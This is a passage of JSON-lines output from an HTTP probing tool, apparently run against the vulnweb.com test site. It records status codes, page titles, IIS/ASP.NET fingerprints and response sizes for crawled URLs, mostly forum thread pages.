Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.016700683Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=15\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=15\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=15\",\"time\":\"349.77255ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.028608536Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=18\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=18\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=18\",\"time\":\"344.398841ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.032356805Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=20\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=20\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=20\",\"time\":\"339.310981ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.032954421Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=19\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=19\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=19\",\"time\":\"347.872459ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.036833377Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=17\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=17\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=17\",\"time\":\"357.222558ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.049509348Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=2\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=2\",\"title\":\"acuforumMr.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=2\",\"time\":\"349.250248ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":291,\"lines\":46,\"status_code\":200,\"content_length\":3056,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.064902444Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=21\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=21\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=21\",\"time\":\"352.786102ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.075440922Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=22\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=22\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=22\",\"time\":\"358.922994ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.080012936Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=24\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=24\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=24\",\"time\":\"356.453631ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.08044412Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=23\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=23\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=23\",\"time\":\"351.63543ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.08765928Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=25\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=25\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=25\",\"time\":\"356.208657ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.340907665Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=26\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=26\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=26\",\"time\":\"349.108139ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.396290442Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=27\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=27\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=27\",\"time\":\"356.647332ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.465386844Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=28\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=28\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=28\",\"time\":\"349.999685ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.482108509Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=29\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=29\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=29\",\"time\":\"351.240993ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.489677571Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=3\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=3\",\"title\":\"acuforumMr.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=3\",\"time\":\"362.544572ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"DreamWeaver\",\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":291,\"lines\":46,\"status_code\":200,\"content_length\":3062,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.583493161Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=4\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=4\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=4\",\"time\":\"345.305106ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.772676234Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=41\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=41\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=41\",\"time\":\"345.332414ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.83067802Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=46\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=46\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=46\",\"time\":\"345.845734ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.838658424Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=45\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=45\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=45\",\"time\":\"354.001962ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.84104105Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=48\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=48\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=48\",\"time\":\"349.480573ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.843850239Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=49\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=49\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=49\",\"time\":\"345.460398ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.854515648Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=47\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=47\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=47\",\"time\":\"358.910362ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.886271019Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=5\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=5\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=5\",\"time\":\"353.340189ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:06.96663275Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=6\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=6\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=6\",\"time\":\"357.629831ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:07.028132148Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=7\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=7\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=7\",\"time\":\"349.015291ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.318080281Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=8\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=8\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=8\",\"time\":\"345.328109ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.345227956Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/showthread.asp?id=9\",\"input\":\"http://testasp.vulnweb.com/showthread.asp?id=9\",\"title\":\"500 - Internal server error.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/showthread.asp?id=9\",\"time\":\"352.924545ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":70,\"lines\":30,\"status_code\":500,\"content_length\":1208,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.362870727Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/styles.css’\",\"input\":\"http://testasp.vulnweb.com/styles.css%E2%80%99\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/styles.css%E2%80%99\",\"time\":\"352.093991ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.364611349Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/dot.\",\"input\":\"http://testasp.vulnweb.com/t/dot.\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/dot.\",\"time\":\"343.206143ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.367455071Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/styles.css\",\"input\":\"http://testasp.vulnweb.com/styles.css\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/styles.css\",\"time\":\"358.47716ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":201,\"lines\":190,\"status_code\":200,\"content_length\":3390,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.381427873Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit\\u003c/td\",\"input\":\"http://testasp.vulnweb.com/t/fit%3C/td\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit%3C/td\",\"time\":\"344.049825ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.383150894Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/dot.gif\",\"input\":\"http://testasp.vulnweb.com/t/dot.gif\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"image/gif\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/dot.gif\",\"time\":\"352.47942ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":43,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.395381646Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/f\",\"input\":\"http://testasp.vulnweb.com/t/f\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/f\",\"time\":\"356.539498ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.399355093Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.tx\",\"input\":\"http://testasp.vulnweb.com/t/fit.tx\",\"title\":\"404 - File or directory not found.\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.tx\",\"time\":\"355.880388ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":76,\"lines\":30,\"status_code\":404,\"content_length\":1245,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.412456697Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt\",\"time\":\"354.716166ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.420765956Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/search?hl=en\\u0026q=testing\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%3F.com/search?hl=en\\u0026q=testing\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/search?hl=en\\u0026q=testing\",\"time\":\"338.561135ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.422799161Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/news/story/0ap3000000944744/article/analytics/dtm/header-2012\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%3F.com/news/story/0ap3000000944744/article/analytics/dtm/header-2012\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/news/story/0ap3000000944744/article/analytics/dtm/header-2012\",\"time\":\"342.90242ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows Server\"],\"words\":1,\"lines\":1,\"status_code\":200,\"content_length\":64,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:17:16.428347391Z\",\"port\":\"80\",\"url\":\"http://testasp.vulnweb.com/t/fit.txt?.com/news/story/0ap2000000266504/article/bill-belichick-disagrees-with-penalty-call-in-pats-loss\",\"input\":\"http://testasp.vulnweb.com/t/fit.txt%3F.com/news/story/0ap2000000266504/article/bill-belichick-disagrees-with-penalty-call-in-pats-loss\",\"scheme\":\"http\",\"webserver\":\"Microsoft-IIS/8.5\",\"content_type\":\"text/plain\",\"method\":\"GET\",\"host\":\"44.238.29.244\",\"path\":\"/t/fit.txt?.com/news/story/0ap2000000266504/article/bill-belichick-disagrees-with-penalty-call-in-pats-loss\",\"time\":\"360.620913ms\",\"a\":[\"44.238.29.244\"],\"tech\":[\"IIS:8.5\",\"Microsoft ASP.NET\",\"Windows 